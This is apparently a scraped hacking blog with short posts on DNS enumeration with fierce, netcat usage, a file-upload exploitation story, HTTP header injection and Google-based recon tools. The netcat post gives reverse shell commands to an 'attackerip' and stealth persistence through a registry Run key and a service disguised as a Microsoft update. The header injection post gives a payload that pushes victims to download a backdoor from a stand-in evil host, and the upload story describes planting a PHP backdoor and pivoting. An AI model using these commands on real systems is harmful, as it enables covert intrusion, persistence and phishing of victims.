The site moved to root domain where all post are imported. Please go to http://pusheax.com/
Enumeration and vulnerability analysis.
fierce (which can be used for brute forcing and really a good tool)
host (command) etc.
I have seen fierce is a powerful tool for Dns Enumeration. Often I use it for Enumerating DNS. First this tool will check that if the site allow any zone transfer or not . If the Target site does not allow Zone transfer then it will start Brute forcing using a default wordlist came with the tool. But believe it or not most of time i got very good result from this tool. Try it out yourself please!!!.
This tool is written in perl:
fierce.pl (C) Copywrite 2006,2007 – By RSnake at http://ha.ckers.org/fierce/
Usage: perl fierce.pl [-dns example.com] [OPTIONS]
Fierce is a semi-lightweight scanner that helps locate non-contiguous
IP space and hostnames against specified domains. It’s really meant
as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all
of those require that you already know what IP space you are looking
for. This does not perform exploitation and does not scan the whole
internet indiscriminately. It is meant specifically to locate likely
targets both inside and outside a corporate network. Because it uses
DNS primarily you will often find mis-configured networks that leak
internal address space. That’s especially useful in targeted malware.
-connect Attempt to make http connections to any non RFC1918
(public) addresses. This will output the return headers but
be warned, this could take a long time against a company with
many targets, depending on network/machine lag. I wouldn’t
recommend doing this unless it’s a small company or you have a
lot of free time on your hands (could take hours-days).
Inside the file specified the text “Host:n” will be replaced
by the host specified. Usage:
perl fierce.pl -dns example.com -connect headers.txt
-delay The number of seconds to wait between lookups.
-dns The domain you would like scanned.
-dnsfile Use DNS servers provided by a file (one per line) for
reverse lookups (brute force).
-dnsserver Use a particular DNS server for reverse lookups
(probably should be the DNS server of the target). Fierce
uses your DNS server for the initial SOA query and then uses
the target’s DNS server for all additional queries by default.
-file A file you would like to output to be logged to.
-fulloutput When combined with -connect this will output everything
the webserver sends back, not just the HTTP headers.
-help This screen.
-nopattern Don’t use a search pattern when looking for nearby
hosts. Instead dump everything. This is really noisy but
is useful for finding other domains that spammers might be
using. It will also give you lots of false positives,
especially on large domains.
-range Scan an internal IP range (must be combined with
-dnsserver). Note, that this does not support a pattern
and will simply output anything it finds. Usage:
perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co
-search Search list. When fierce attempts to traverse up and
down ipspace it may encounter other servers within other
domains that may belong to the same company. If you supply a
comma delimited list to fierce it will report anything found.
This is especially useful if the corporate servers are named
different from the public facing website. Usage:
perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany
Note that using search could also greatly expand the number of
hosts found, as it will continue to traverse once it locates
servers that you specified in your search list. The more the
-suppress Suppress all TTY output (when combined with -file).
-tcptimeout Specify a different timeout (default 10 seconds). You
may want to increase this if the DNS server you are querying
is slow or has a lot of network lag.
-threads Specify how many threads to use while scanning (default
is single threaded).
-traverse Specify a number of IPs above and below whatever IP you
have found to look for nearby IPs. Default is 5 above and
below. Traverse will not move into other C blocks.
-version Output the version number.
-wide Scan the entire class C after finding any matching
hostnames in that class C. This generates a lot more traffic
but can uncover a lot more information.
-wordlist Use a seperate wordlist (one word per line). Usage:
perl fierce.pl -dns examplecompany.com -wordlist dictionary.txt
Run: perl fierce.pl -dns yourtarget.net
Lots of dorks you will find in exploit-db. Hope you will enjoy!!!
Netcat actually is not a hacking tool. It is a networking tool. We can use it to communicate with other computers remotely, transferring data,Chatting etc. But We can also use it as Backdoor or hacking tool, For example “ping” is not hacking or DoS tool but we can DoS using “Ping” …no? So we can’t call it DDOSER tool.
Anyway, Often netcat is called as “Swiss Army Knife”
I will explain the basic usage of it now
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port]
-c shell commands as `-e’; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. ‘ftp-data’).
We can use netcat as backdoor, banner grabbing, port scanning, chatting, file transfer, traffic redirection etc.
Banner Grabbing :
root@linux:~# nc -vvv 192.168.96.129 80
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 80 (www) open
GET / HTTP/1.1
HTTP/1.1 400 Bad Request
Date: Sat, 14 Apr 2012 07:20:01 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<title>400 Bad Request</title>
<p>Your browser sent a request that this server could not understand.<br />
<address>Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1 Server at localhost Port 80</address>
sent 16, rcvd 617
How: nc -vvv ip port . Then Hit enter twice.
Simply we see The version of Web server is Apache 2.2.21 (Wind32) . Not only that , We can see OpenSSL version, PHP version etc. Do you know how a scanner scan for vulnerability against a target? The Scanner first find the version of server/application, then check on the local database(For example nessus,acunetix etc). We also can start Google search vulnerability for specific version …. no?
The same way we can find other application version, information:
root@linux:~# nc -vvv 192.168.96.129 21
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 21 (ftp) open
220 FileZilla Server version 0.9.39 beta written by Tim Kosse (Tim.Kosse@gmx.de) Please visit http://sourceforge.
You can try to connect to any port excluding 443 since netcat can’t communicate over ssl. Or do the tunneling.
Chat with your Hacker friend:
Suppose there are two hacker called hacker1 and hacker2. They don’t want to get caught for using other messenger, or they just do private communication.
How they are doing this ? Simple command :
-vvv stand for verbose(as much as possible)
-l for listening(Opening the port to connect)
-p for port(any specific port to connect)
hacker2(Connecting to hacker1):
nc -vvv 192.168.96.129 4444 (4444 is the port)
Transfer the File:
Hackers do not want to transfer the file via public file sharing server because of risk. But they can use netcat for transfer the file .
Suppose hacker1(Blackhat) has some passwords file on his computer ( 192.168.96.129) and want to transfer the file to hacker2( 192.168.1.213).
Hacker1 netcat command was:
hacker2 netcat command was:
nc -vvv 192.168.96.129 >passwords.txt
Let’s do a port scan using netcat:
we can scan port with simple command nc -vvv targetip 1-65535
Here extra “-z” option use Input output method.
simple to create a backdoor using netcat:
windows server mode:
-L don’t die.
-e start command line.
Linux/Unix server mode:
-k don’t die
-e command mode.
Connect to the server:
How about Reverse connection? Try the following on victim machin:
nc -e cmd -d attackerip 1337
On your own computer(Attacker):
nc -vv -l -k -p 1337
Now you are thinking that how hacker can install the netcat on victim computer… right? ..
1. They first compromise the target system/server. And they want permanent access to the victim machine. So only way is uploading backdoor, setting it as start up application.
2. They create a batch file or shell script or downloader. Then sends it to the victim(Undetected by AV). Whenever the victim click on the script/batch it start downloading, installing etc automatically.
So how you make the netcat as stealth backdoor? Answer is by editing registry or moving to startup folder. Suppose you compromised an IIS web server and uploaded cmdasp.asp backdoor. Now you want to install the netcat as a stealth backdoor for some reason().
Netcat as start up backdoor:
Run this command:
reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v microsoft_service /t REG_SZ /d “c:nc.exe -d targetip 1337 -e cmd.exe”
Create a netcat listener on your local computer . Whenever the victim reboot his computer, he will get connected to you.
How about netcat as services ? try:
sc create microsoft_update binpath=”cmd /K start c:nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore
Now try to make the backdoor to connect to you (hint: at).
By the way, you can do much more with netcat . netcat is not so bad as a backoor and if you can edit the C code netcat then it can be a supper backdoor.
More about it:
I did my job very quickly after found a File Uploading Vulnerability in a website. I was pentesting a network remotely (Blackbox testing) and it was really hard. I often browsed their website. Even I did not able to ping their IP because it was firewall . My only rest thing to be done was Social Engineering and Web pentesting (Really i was confused!!! If the SE and Web hacking method does not work then perhaps my heart about to attacked !!! lol(my heart is not weak)). Anyway, I scanned the site with various vulnerability scanner ,,,, no luck!!! So I started browsing the site manually(and Google searching randomly, Truthfully dunno what to find).
Suddenly I found a personal file upload link which was hell to find the link but my google friend helped me much. The link was like : www.hired-me.org/test/personal/re_al/file2010.php . It just accept 3 types of file extension JPEG, TEXT,CSV. First time i did not think that this link has any vulnerability(Already confused for the fucking scanner!!!).
How i exploited:
First i upload a jpeg file and try to find the location where it is saved. It was also hard(My knowledge is sucks?). OK, At least i found the jpeg file is located in the www.hired-me.com/index/hidden/director/test.jpeg , Everything Okay. Now i quickly create a php file[test.php] :
I quickly try to upload the “test.php” and “test.jpeg.php” but error “Unknown File Extension” . This error make me sure that the file extension is filtered.
Again i renamed the “test.php” to “test.php.jpeg” . Now no error!!! wow!!
I quickly check www.hired-me.com/index/hidden/director/test.php.jpeg and the page display “This is test“. Now i decide to upload a real php backdoor. Then upload some rooting tools then created ssh and then compromised two additional machine. Job is done!!!
Feedback are welcome!!!
If we can inject newline into the header we control , then we will be able to insert some additional HTTP Header and some nasty body text. I don’t think so that we can compromised a website/server via this vulnerability. But still it is power for Social Engineering attack, Phishing, Redirecting to malicious site, downloading backdoor, virtual defacement, sometime injecting cookie etc. It is much like XSS.
Basically this vulnerability found in “set-cookie” and “location” . If we connect to a website:
If this is behavior of the host then we should try to insert Carriage-return and Line-feed :
If the host is vulnerable then it will reply with a additional line “it-is=vulnerable” like this:
Simply a hacker can force the users to download a backdoor:
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1
We can also create fake Cookie and send the url to the poor victim . Just think smartly and you will find some other way 😉
How to use:
simply type in Terminal/Konsole ” ./metagoofil.py” and you will get all options to use it.
Also they gave some example to use it. But here is practical usage:
It will start searching and will automatic download the specified file (Lol be aware).
Now try against your own site for practice purpose.
I don’t think that we need someone to learn to use tools.
Easy man … So try everything!!!
Goohost is a simple Bash script to search(Google) information against the target website. It search IP, Subdomain and IP and email.
/pentest/enumeration/google/goohost# ./goohost.sh -t backtrack-linux.org -m ip -p 10 -v
Type ./goohost for helps…